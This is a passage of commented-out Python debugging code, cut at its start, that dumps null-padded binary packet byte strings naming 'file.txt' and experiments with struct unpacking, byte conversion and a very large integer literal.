00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
# b'\x00\x01\x00\x00\xa0\x00file.txt\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
# b'\x00\x02\x00\x01\x90\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
# b'\x00\x01\x00\x00 \x00file.txt\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
#unpacked_data = unpack('!hhBBBBB11B1466B', newPackedData) #gives (2, 2, 1079613850)
# print("Calculated size:",calcsize('!hh5c11c1466c'))
# a = newPackedData[0:2]
# b = newPackedData[2:4]
# c = newPackedData[5]
# d = newPackedData[6]
# print("Short1 value:",*unpack('!h',a))
# print("Short2 value:",*unpack('!h',b))
# #print(bin(int(str(newPackedData), base=16)))
# print("\r\nbyte conversion".upper())
# ind = 0
# while ind < 100:
# print(ind,byte(newPackedData[ind]),">",newPackedData[ind].to_bytes(len(str(newPackedData[ind])), byteorder='big').decode("UTF-8"))
# print(bin(int(str(newPackedData[ind]), base=16)))
# ind+=1
# print(str(a),str(b),c)
# print("\r\ncomplete decode".upper())
# print('['+newPackedData.rstrip(b'\x00').decode("UTF-8")+']')
# exInt = 12075336018917623508921648137564686655108705628337899529505358960265485447951380733228879683495165200700590295213270442088314626966813275097228206673974434807609125336865818217787823015951417015870313985057904711487529256732084736151582724591874416895889976548947183163936055893368731514631912340788400512959741819411672983235969246897994571707108465802086483408031194144289342715382347360969490607677725890171255419762143947141501859146905391130857352510592765641723754696804898580270780222474374275130718936146580035838462477068487324411070183616166274022075514034521953766227372562300966326836856561447897380443891742073227243870733487354652185253362867692148744422160715312193982684746198116419025381624329288860839013489648247819451512931855703087894868587698427566881318980411751129278751795326191914735536438916023120503867214441674777315294367659942325838548279621916972733822027345234897216115253519137264871700115569989694997301606705289476668031372935645001690368702124697409719403765422984474067945852997136672512847705319653602956906716525051476074586815350820536297823612220367299293191296644343472949696910939437680702439099415602357918768172428389463212040285061235500490123902085072098837385621646608319949728090529576301926849261937361073075243227698618507390952708453640066158409445057387569066815271117950172232611163580546921390346235315560367399161340654940665977674914465394941309833639134891128383920994120122303173738980799863346112416004705645630705641014222759899772424727518379659428808223079650409741471652786677752379